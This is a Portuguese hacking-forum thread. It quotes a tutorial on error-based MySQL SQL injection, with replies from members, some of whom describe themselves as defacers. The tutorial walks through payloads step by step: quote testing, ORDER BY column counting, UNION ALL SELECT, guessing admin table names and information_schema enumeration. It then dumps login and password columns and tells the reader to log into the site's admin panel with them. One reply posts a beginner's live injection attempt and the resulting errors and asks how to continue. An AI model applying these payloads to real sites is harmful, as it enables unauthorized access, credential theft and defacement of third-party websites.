Tweet
Belo tuto...
vlw eu ja fiz um e deu
vlw eu ja fiz um e deu
-
sigpic
Concentre-se naquilo que você é bom, delegue todo o resto.
Steve Jobs -
olá verificando essa sua técnica twi, para quem tem um certo conhecimento faz realmente facilmente essa técnica, essa sua é para um nivel acima de pessoas aprendendo e deveria ser mais explicada para que o pessoal todo do forum conseguisse entendeu, pois lembre-se que estamos lidando com pessoas de diversos conhecimentos.
Pare mim no meu nivel eu entendi e já utilizava e achei muito bacana, mais até para nós ficou um pouco vago algumas coisas como o hackeralp mostrou.Comment
-
quando o erro cai num sintaxe assim da pra usar o SQLI ?? ponho o sinal de "-" antes do % ?? sem o % nao da erro no sql !!!
/produtos.php?categoria=%2527
to iniciando no defacer !!!!
qndo adiciono isso ao site tipo assim Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... cae neste erro aqui...
SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND ativo=1' at line 1SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND ativo=1 LIMIT 0,25' at line 4
Fatal error: Call to a member function getCategoria() on a non-object in /var/www/html/produtos.php on line 127
e agora como prosseguir ??sigpicComment
-
Muito bom esse tuto, tive o privilegio de ver umas dessas aulas em que o twin ensina mais detalhadamente, valeu novamente twin abraços td de bom pra ti.Comment
-
otimo tuto , vlw por compartilharComment
-
Metodo um pouco complicado , varias ferramentas pode fazer isso e facilitar mais nas suas defacer .Comment
-
Dúvida
Este procedimento funciona para Oracle ?
Postado Originalmente por Twi John Ver Post
Por Twi John
Primeiramente quero mostrar para vocês um site onde vocês poderam encontrar mais sobre novas vulnerabilidades, como se proteger de vulnerabilidades da web.
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Nessa aula estremos aprendendo SQLi, no entanto dessa vez estaremos consultado o database Mysql para obter informações de login e senha.
Aqui esta o site: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Para descobrir se pode estar vulneravel, coloque ' depois do link, caso dei algum erro tem grande chance de estar vulneravel.
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...'
Um exemplo de erro: Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/site/public_html/noticias/index.php on line 282
Essa falha é baseada em erros.
Vamos pegar o numero de colunas usando ORDER BY *
É usado dessa maneira:
+order+by+1 //Sem erro
+order+by+2 //Sem erro
+order+by+3 //Sem erro
+order+by+4 //Sem erro
+order+by+5 //Sem erro
+order+by+6 //Erro
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Então são apenas 5 colunas
Vamos uni-las, usando UNION ALL SELECT *
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Coloque um traço (-) antes do valor da variavel ficando assim:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Irão aparecer numeros, eles que nóis iremos subtituir por informações:
Precisamos encontrar a tabela do login agora, podemos usar Brute Force, ou então information_schema. O information_schema só funciona em databases MYSQL acima de versão acima de 5.0, para descobrir a versão use: version()
+union+all+select+1,version(),3
//--Brute Force--\\
Vamos tentar colocar tabelas até que não apareça erro:
UNION ALL SELECT * FROM ADMIN == erro
"" "" "" "" LOGIN == erro
"" "" "" "" USER == erro
"" "" "" "" USERS == erro
"" "" "" "" USUARIOS == sem erro
Então no caso ficaria assim: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Você pode usar: admin, admins, usuarios, usuario, user, users, user_name, username, login, adm, tb_usuarios, tb_admin ... entre outros.
//--INFORMATION_SCHEMA--\\
DATABASE: INFORMATION_SCHEMA
TABELA: TABLES
COLUNA: TABLE_NAME
Sintaxe = Exemplo: UNION ALL SELECT 1,TABLE_NAME,3 FROM INFORMATION_SCHEMA.TABLES
Para ir passando de tabela você usa LIMIT *
LIMIT 1,1
LIMIT 2,1
LIMIT 3,1
LIMIT 4,1
LIMIT 5,1
... E assim vai indo até encontrar uma tabela de login.
Ex: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
//
Vamos agora descobrir as colunas de login, você pode usar as mesmas tecnicas de brute force e information_schema, no entanto information_schema é um pouco diferente:
DATABASE: INFORMATION_SCHEMA
TABELLA: COLUMNS
COLUNA: COLUMN_NAME
Sintaxe = Exemplo: UNION ALL SELECT 1,COLUMN_NAME,3 FROM INFORMATION_SCHEMA.COLUMNS
Para passar de coluna pode usar o LIMIT também.
//
Agora continuando suponhamos que eu tenha pegado a tabela USUARIOS e as colunas LOGIN e SENHA, para pegar as informações de login e senha é so digitar eles no seu site, nos numeros visiveis, suponhamos que tenha parecido o 2 e 3 então vamos substituir eles pela informação:
UNION ALL SELECT 1,LOGIN,SENHA,3,4,5 FROM USUARIOS
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Agora é só encontrar a area de login, geralmente fica em /admin , /adm/ , /administrator /login.php , ou você pode usar o acunetix ou algum outro tool para encontrar a area de login.
Ao encontra-la é só você se logar com as informações que você pegouComment
Comment